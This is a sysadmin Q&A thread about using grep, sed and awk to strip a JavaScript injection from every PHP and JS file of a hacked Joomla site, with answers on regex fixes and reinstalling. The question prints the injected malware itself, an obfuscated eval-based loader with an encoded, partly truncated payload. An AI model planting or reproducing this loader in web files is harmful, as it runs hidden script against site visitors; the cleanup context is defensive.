Home / server / Questions / 515095
Accepted
Matt Bear
Asked: 2013-06-12 12:02:35 +0800 CST

GREP find and use SED to replace string on all files

  • 772

One of our old hosted Joomla sites suffered a JavaScript injection, and im going through cleaning it up. The following code was inserted into every .php or .js file:

<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";

#/0c0896#
?>

"exact syntax, though the actual code is MUCH longer, I cut a lot of hex from the middle to make it easier"

I am trying to use GREP and SED to do a find and replace on all files, and I don't think I have my syntax for SED quite right.

grep -rl "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs sed -i 's/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g

What I am going for here is to use grep to search all files for a snippet of the code, which is working, and then use SED to replace the tags #0c0896# and everything in between with nothing.

grep

2 Answers

  1. Best Answer

    Sed is the wrong tool, because it only considers a line at a time.

    Awk is a much better tool for taking action on content between two matching lines.

    awk '/a/,/b/ { next } { print }'

    will skip everything between lines that match regular expression a and regular expression b.

    However, a more direct answer is that once a machine has been compromised, you can't trust anything on it. The only appropriate course of action for a professional sysadmin is to reinstall the machine from scratch.

    • 4

  2. Instead of

    <?[.*]#0c0896#[.*]#\/0c0896#[.*]?>

    use

    <?.*#0c0896#.*#\/0c0896#.*?>

    A bracket expression matches only one single character, it that character is in the brackets. Also inside a bracket expression, regex quantifiers and other special characters lose their meaning. The expression you provided means: match an open angle bracket, followed by a question mark, followed by either a dot or a star, followed by ...

    Sed is line-oriented, so the .* in the above will not span across lines. Is the offending code on one line?

    • 1